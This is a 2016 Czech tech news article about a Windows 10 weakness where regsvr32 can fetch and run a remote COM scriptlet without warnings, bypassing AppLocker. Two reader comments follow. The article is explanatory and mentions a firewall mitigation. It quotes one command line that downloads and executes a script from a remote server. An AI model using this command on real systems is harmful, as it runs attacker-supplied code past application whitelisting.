Hlavní navigace

Chyba ve Windows 10 umožňuje spustit aplikaci bez vědomí uživatele

Daniel Dočekal

Těžko si představit, jak je možné, že v nejnovějších Windows můžete na dálku spustit jakoukoliv aplikaci bez vědomí uživatele.

Pokud na počítači s Windows 10 použijete Regsvr32, abyste spustili soubor uložený na vzdáleném systému, podaří se vám to. Bez vědomí uživatele, bez varování před instalací a bude ignorován i případný blacklist (AppLocker). Není potřeba mít práva správce ani nic dalšího. Jediná obrana zatím spočívá v zablokování Regsvr32 na úrovni firewallu (a také Regsvr64).

Důležité je, abyste tuhle zranitelnost pochopili správně – neznamená, že někdo může na dálku na vašem počítači něco spustit. Znamená, že pokud vás (uživatele) někdo přesvědčí ke kliknutí na něco nevhodného, může tím dojít ke spuštění a instalaci čehokoliv, aniž byste si uvědomili, že k něčemu takovému došlo. 

START17

Podmínkou samozřejmě je, že něco spustíte (což uživatelé dělají rádi), a také to, že bude dostupný vzdálený systém, který se postará o dodání skriptu. Ten už se pak postará o zbytek.

Podrobnosti přímo od objevitele chyby najdete v Bypass Application Whitelisting Script Protections – Regsvr32.exe & COM Scriptlets (.sct files) a v zásadě stačí použít něco jako „regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll“, ale až tak jednoduché to samozřejmě není. Kompletní proof of concept prozradí více.

Našli jste v článku chybu?
2. 5. 2016 12:43

Trochu mi to přípomíná ten vtip o hubícím přípravku na moly v podobě kuliček, které je potřeba molovi vložit do úst, kulička vybuchne a mol umře. „A když už mám toho mola v ruce, tak ho můžu rovnou rozmáčknout, ne?“ „Jo, to by taky šlo.“

Aneb proč spouštět malware složitě přes regsvr, když mu ho můžete poslat mailem s doprovodným textem typu „prosím, otevřete přílohu a postupujte dle zobrazených instrukcí“.

3. 5. 2016 12:43
krakonoš (neregistrovaný)

Vlhké sny šmíráků se naplňují. Nastavil sis firewall? Nevadí, další záplata ho obejde. Vyčistil sis systém něčím od někoho jiného? Další záplata to vyřeší. Zakázal jsi telemetrii? Další záplata ji spustí znovu, jako skrytý proces. Odpojil ses od netu? Chyba, O. S. nepůjde spustit. Přešel jsi na jiný O. S.? Příští generace HW to vyřeší. Ale šmírovat budeme, ať chceš, nebo ne.